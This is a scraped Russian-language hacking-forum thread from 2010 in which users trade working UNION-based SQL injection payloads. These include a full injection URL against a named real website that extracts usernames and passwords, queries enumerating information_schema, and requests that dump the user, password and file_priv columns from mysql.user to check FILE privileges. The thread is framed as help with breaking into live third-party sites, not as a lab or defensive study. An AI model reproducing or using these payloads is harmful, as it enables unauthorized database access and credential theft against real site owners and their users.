Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
20.01.2010, 21:36
|
|
Новичок
Регистрация: 12.01.2010
Сообщений: 13
Провел на форуме:
61009
Репутация:
18
|
|
Для GinTonic:
1. Думаю для автора скули лутше так будет):
Код:
http://www.aaadtc.com/page.php?content=buy&cnum=-21+union+all+select+1,2,password,4,5,6,7,8,9,10,11,username,13,14+from+users--
2. Если убрать password и поставить 3 или 35656 то ты увидишь как сайт выведет эти числа, можно заменять любое число которое выводица на сайте при скуле, а уже пассворд и юсернаме это часть(столбцы) таблицы юсер для их вывода ты должен их знать!
Читай статьи на форуме))):
Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд
SQL инъекция (в т.ч. и blind SQL)
Примеры:
Sql Инъекции
Последний раз редактировалось Alf0x0ns; 20.01.2010 в 22:31..
|
|
|
20.01.2010, 22:56
|
|
Новичок
Регистрация: 18.12.2009
Сообщений: 13
Провел на форуме:
96637
Репутация:
0
|
|
Сообщение от ILYAtirtir
смотри внимательней
а для чего там all нужен?
|
|
|
|
21.01.2010, 01:10
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022
Репутация:
4
|
|
такой инъекшн, помогите раскрутить..
так все выводить, базу:таблицу:столбец
Код:
-133+UNION+SELECT+1,2,3,4,concat_ws(0x3a,table_schema,table_name,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_name=0x75736572+LIMIT+0,1+--+
пытаюсь посмотреть данные, но ничего нет, тоесть вообще пусто, даже пропадают цифры, в принтабельных полях
Код:
-133+UNION+SELECT+1,2,3,4,concat_ws(0x3a,USERID,USERNAME,USERPASSWORD),6,7,8,9,10+FROM+basename.user+LIMIT+0,1+--+
но ведь должны быть какие-то данные, я пробовал в других таблицах смотреть, но тоже самое, не выводит ничего. Может что не так делаю? Или все таки пустые таблицы?
зы Не хотелось бы светить сайт, может кто по асикю подскажет?
зыы и еще может кто нить подскажет, что можно почитать по скулям через куки, а то ничего толком найти не могу ((
Последний раз редактировалось Gidz; 21.01.2010 в 01:21..
|
|
|
|
21.01.2010, 02:50
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
тест пустая табла или нет
...+select+count(*)+from+....
 |
|
|
|
21.01.2010, 15:41
|
|
Познающий
Регистрация: 14.03.2009
Сообщений: 38
Провел на форуме:
250929
Репутация:
2
|
|
Ребята такой вопрос как узнать есть ли привелегия FILE в mysql через sql-inj,для версии 4.*.* и 5.*.* ?
|
|
|
|
21.01.2010, 15:42
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
file_priv
|
|
|
|
21.01.2010, 15:51
|
|
Познающий
Регистрация: 14.03.2009
Сообщений: 38
Провел на форуме:
250929
Репутация:
2
|
|
Сообщение от M.W.N.N.
file_priv
site.com/new.php?id=-1+union+select+1,file_priv,3--
так да?
щас просто попробывал на пару сайтов ошибка вылазит =/
|
|
|
|
21.01.2010, 15:55
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
выводит привилегии на доступ у юзеров.
site.com/new.php?id=-1+union+select+1,concat_ws(0x3a,user,password,file _priv),3+from+mysql.user--
|
|
|
|
21.01.2010, 16:36
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
Сообщение от erolom
Ребята такой вопрос как узнать есть ли привелегия FILE в mysql через sql-inj,для версии 4.*.* и 5.*.* ?
Код:
site.com/new.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where+user='username'/*
* где username - имя юзера под которым работает база.
Последний раз редактировалось RulleR; 21.01.2010 в 16:39..
|
|
|
|
21.01.2010, 18:48
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022
Репутация:
4
|
|
Сообщение от j0ker13
тест пустая табла или нет
0 я так понял означает что таблица пуста? 
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
